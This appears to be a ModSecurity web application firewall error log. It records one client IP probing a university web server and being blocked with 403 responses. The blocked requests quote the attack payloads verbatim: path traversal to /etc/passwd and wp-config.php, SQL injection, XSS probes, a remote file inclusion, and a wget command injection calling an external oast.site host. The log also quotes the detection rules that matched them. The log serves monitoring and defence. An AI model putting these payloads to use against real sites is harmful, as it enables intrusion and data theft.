[Tue Aug 29 11:48:24.492817 2023] [:error] [pid 2345] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gexdx6ahtchpic.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gexdx6ahtchpic.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14mMCo-f0AAAkpFXwAAAAI"]
[Tue Aug 29 11:48:28.015891 2023] [:error] [pid 2353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14nMCo-f0AAAkxFxoAAAAV"]
[Tue Aug 29 11:48:31.649322 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAlQ3p8AAAAw"]
[Tue Aug 29 11:48:32.356290 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:data[User][username]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:data[User][username]: data[User][username]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/users/login"] [unique_id "ZO14oMCo-f0AAAlQ3qIAAAAw"]
[Tue Aug 29 11:48:33.433324 2023] [:error] [pid 2348] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAksksIAAAAN"]
[Tue Aug 29 11:48:35.401317 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAlV8BQAAAA1"]
[Tue Aug 29 11:48:36.355070 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14pMCo-f0AAAlkwgYAAAAO"]
[Tue Aug 29 11:48:37.369624 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pcCo-f0AAAlUld8AAAA0"]
[Tue Aug 29 11:48:38.364870 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14psCo-f0AAAlUleIAAAA0"]
[Tue Aug 29 11:48:38.383021 2023] [:error] [pid 2350] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAku@lQAAAAQ"]
[Tue Aug 29 11:48:40.357078 2023] [:error] [pid 2381] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAlNqr4AAAAt"]
[Tue Aug 29 11:48:43.363654 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAkqHtMAAAAM"]
[Tue Aug 29 11:48:43.409062 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAk7QKwAAAAi"]
[Tue Aug 29 11:48:47.476668 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAknEKMAAAAB"]
[Tue Aug 29 11:48:49.373276 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAkGCYwAAAAE"]
[Tue Aug 29 11:48:49.412286 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAlUlfgAAAA0"]
[Tue Aug 29 11:48:49.447115 2023] [:error] [pid 2380] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAlM8jsAAAAs"]
[Tue Aug 29 11:48:50.425435 2023] [:error] [pid 2418] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAlyrBcAAAAI"]
[Tue Aug 29 11:48:52.364061 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAlkwh8AAAAO"]
[Tue Aug 29 11:48:53.364679 2023] [:error] [pid 2380] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAlM8j8AAAAs"]
[Tue Aug 29 11:48:53.370198 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tcCo-f0AAAknEKwAAAAB"]
[Tue Aug 29 11:48:54.413165 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAlkwiQAAAAO"]
[Tue Aug 29 11:48:55.416662 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAjtdCkAAAAX"]
[Tue Aug 29 11:48:56.365543 2023] [:error] [pid 2380] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14uMCo-f0AAAlM8kQAAAAs"]
[Tue Aug 29 11:48:57.437101 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAkqHuUAAAAM"]
[Tue Aug 29 11:48:57.442097 2023] [:error] [pid 2361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAk5CgMAAAAg"]
[Tue Aug 29 11:48:58.359740 2023] [:error] [pid 2348] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14usCo-f0AAAkskuEAAAAN"]
[Tue Aug 29 11:48:58.385674 2023] [:error] [pid 2427] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14usCo-f0AAAl74uIAAAAj"]
[Tue Aug 29 11:48:59.391577 2023] [:error] [pid 2414] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14u8Co-f0AAAluT2YAAAAe"]
[Tue Aug 29 11:49:02.453711 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gzqcry4dh3o5zf.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAkGCZ8AAAAE"]
[Tue Aug 29 11:49:04.464824 2023] [:error] [pid 2358] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAk2KZ8AAAAb"]
